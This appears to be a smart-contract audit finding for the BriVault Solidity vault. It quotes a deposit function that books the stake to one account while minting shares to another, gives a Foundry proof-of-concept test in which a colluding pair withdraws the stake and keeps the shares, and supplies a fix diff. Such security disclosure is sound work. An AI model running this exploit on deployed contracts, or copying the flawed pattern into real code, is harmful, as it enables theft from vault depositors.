// Vulnerable version of BriVault.deposit, quoted as-is from the project.
// The two `@>` lines disagree about who the depositor is: the stake is booked
// to `receiver`, but the shares are minted to `msg.sender`.
function deposit(uint256 assets, address receiver) public override returns (uint256) {
require(receiver != address(0));
// Deposits are only accepted before the event starts.
if (block.timestamp >= eventStartDate) {
revert eventStarted();
}
uint256 fee = _getParticipationFee(assets);
// The deposit must cover both the participation fee and the minimum stake.
if (minimumAmount + fee > assets) {
revert lowFeeAndAmount();
}
uint256 stakeAsset = assets - fee;
// BUG: credited to `receiver`, not to the account that receives the shares.
// Also plain `=`: a repeat deposit overwrites the previous stake instead of adding to it.
@> stakedAsset[receiver] = stakeAsset;
uint256 participantShares = _convertToShares(stakeAsset);
// Both transfers are pulled from the caller, not from `receiver`.
IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
IERC20(asset()).safeTransferFrom(msg.sender, address(this), stakeAsset);
// BUG: shares go to `msg.sender`, so `receiver` ends up with a stake but no shares.
@> _mint(msg.sender, participantShares);
emit deposited (receiver, stakeAsset);
return participantShares;
}
// Vulnerable version of BriVault.cancelParticipation, quoted as-is from the project.
// The refund is read from `stakedAsset[msg.sender]`, but the amount burned is
// whatever share balance `msg.sender` currently holds. When `deposit` credits
// `receiver` while minting to `msg.sender`, the receiver burns zero shares here
// and is still paid the full stake, while the depositor keeps the shares.
// Conversely, a caller with a zero stake burns its whole share balance and is refunded nothing.
// NOTE(review): if vault shares are freely transferable (they are minted/burned
// like ERC-20 balances here; confirm no transfer restriction elsewhere), moving
// shares to another address before cancelling reproduces the same mismatch even
// after `deposit` is fixed. Consider burning `_convertToShares(refundAmount)` or
// blocking share transfers until the event starts.
function cancelParticipation () public {
// Cancellation is only allowed before the event starts.
if (block.timestamp >= eventStartDate){
revert eventStarted();
}
// Refund amount comes from the stake ledger...
@> uint256 refundAmount = stakedAsset[msg.sender];
// Ledger is cleared before the external transfer (checks-effects-interactions).
stakedAsset[msg.sender] = 0;
// ...but the burn amount comes from the share balance; nothing ties the two together.
@> uint256 shares = balanceOf(msg.sender);
@> _burn(msg.sender, shares);
@> IERC20(asset()).safeTransfer(msg.sender, refundAmount);
}
pragma solidity ^0.8.24;
import {Test, console} from "forge-std/Test.sol";
import {BriVault} from "../src/BriVault.sol";
import {ERC20Mock} from "@openzeppelin/contracts/mocks/token/ERC20Mock.sol";
/// @title VaultTheftTest
/// @notice Proof of concept for the receiver mismatch in `BriVault.deposit`:
///         the stake is booked to `receiver` while the shares are minted to
///         `msg.sender`. A depositor and a colluding receiver can therefore pull
///         the stake back out via `cancelParticipation` while the depositor keeps
///         the newly minted shares, leaving the vault undercollateralized.
contract VaultTheftTest is Test {
    BriVault public vault;
    ERC20Mock public asset;

    address public owner = makeAddr("owner");
    address public feeAddress = makeAddr("feeAddress");
    address public attacker = makeAddr("attacker");
    address public bob = makeAddr("bob");

    // Vault configuration. The assertions below imply a 3% fee (100 -> 97).
    uint256 private constant PARTICIPATION_FEE_BPS = 300;
    uint256 private constant MINIMUM_AMOUNT = 10 ether;

    // Scenario amounts.
    uint256 private constant HONEST_DEPOSIT = 1000 ether;
    uint256 private constant ATTACK_DEPOSIT = 100 ether;
    // Stake left after the fee on ATTACK_DEPOSIT. The test also expects the
    // attacker's share balance to equal this amount.
    uint256 private constant ATTACK_STAKE = 97 ether;

    /// @dev Deploys the vault as `owner`, seeds it with one honest deposit and
    ///      funds the attacker with exactly the amount used in the attack.
    function setUp() public {
        asset = new ERC20Mock();

        vm.startPrank(owner);
        vault = new BriVault(
            asset,
            PARTICIPATION_FEE_BPS,
            block.timestamp + 1 days,
            feeAddress,
            MINIMUM_AMOUNT,
            block.timestamp + 30 days
        );
        string[48] memory teams;
        teams[0] = "Team A";
        vault.setCountry(teams);
        vm.stopPrank();

        // An honest participant puts real assets in the vault first.
        address honest = makeAddr("legitimateUser");
        asset.mint(honest, HONEST_DEPOSIT);
        vm.startPrank(honest);
        asset.approve(address(vault), type(uint256).max);
        vault.deposit(HONEST_DEPOSIT, honest);
        vm.stopPrank();

        asset.mint(attacker, ATTACK_DEPOSIT);
    }

    /// @dev Attacker deposits naming bob as receiver; bob cancels and is refunded
    ///      the stake while the attacker's shares survive.
    function testTheftViaReceiverMismatch() public {
        uint256 assetsBefore = asset.balanceOf(address(vault));
        uint256 supplyBefore = vault.totalSupply();

        // The attacker pays, but names bob as the receiver.
        vm.startPrank(attacker);
        asset.approve(address(vault), ATTACK_DEPOSIT);
        vault.deposit(ATTACK_DEPOSIT, bob);
        vm.stopPrank();

        // Stake is booked to bob, shares land with the attacker.
        assertEq(vault.stakedAsset(bob), ATTACK_STAKE, "Bob credited with stakedAsset");
        assertEq(vault.balanceOf(bob), 0, "Bob has no shares");
        assertEq(vault.balanceOf(attacker), ATTACK_STAKE, "Attacker has shares");

        // Bob cancels: he is refunded the stake and burns his (empty) share balance.
        vm.prank(bob);
        vault.cancelParticipation();

        assertEq(asset.balanceOf(bob), ATTACK_STAKE, "Bob stole 97 tokens");
        assertEq(vault.balanceOf(attacker), ATTACK_STAKE, "Attacker keeps shares");

        // Net effect: the assets are back where they started, the supply is not.
        uint256 assetsAfter = asset.balanceOf(address(vault));
        uint256 supplyAfter = vault.totalSupply();
        assertEq(assetsAfter, assetsBefore, "Vault back to initial balance");
        assertEq(supplyAfter, supplyBefore + ATTACK_STAKE, "But shares increased");
        assertGt(supplyAfter, assetsAfter, "UNDERCOLLATERALIZED");
    }
}
function deposit(uint256 assets, address receiver) public override returns (uint256) {
+   /// @notice Deposits `assets` minus the participation fee on behalf of `receiver`.
+   /// @dev The stake ledger and the share balance must always name the same account:
+   ///      `cancelParticipation` refunds `stakedAsset[msg.sender]` and burns
+   ///      `balanceOf(msg.sender)`, so crediting one account and minting to another
+   ///      lets the pair withdraw the stake while keeping the shares.
    require(receiver != address(0));
    if (block.timestamp >= eventStartDate) {
        revert eventStarted();
    }
    uint256 fee = _getParticipationFee(assets);
    if (minimumAmount + fee > assets) {
        revert lowFeeAndAmount();
    }
    uint256 stakeAsset = assets - fee;
-   stakedAsset[receiver] = stakeAsset;
+   // Accumulate: `=` would drop an earlier stake on a repeat deposit, while
+   // `cancelParticipation` still burns every share the account holds.
+   stakedAsset[receiver] += stakeAsset;
    uint256 participantShares = _convertToShares(stakeAsset);
    IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
    IERC20(asset()).safeTransferFrom(msg.sender, address(this), stakeAsset);
-   _mint(msg.sender, participantShares);
+   // ERC-4626 `deposit` mints shares to `receiver`; minting here keeps the shares
+   // on the same account that was credited with the stake above.
+   _mint(receiver, participantShares);
    emit deposited (receiver, stakeAsset);
    return participantShares;
}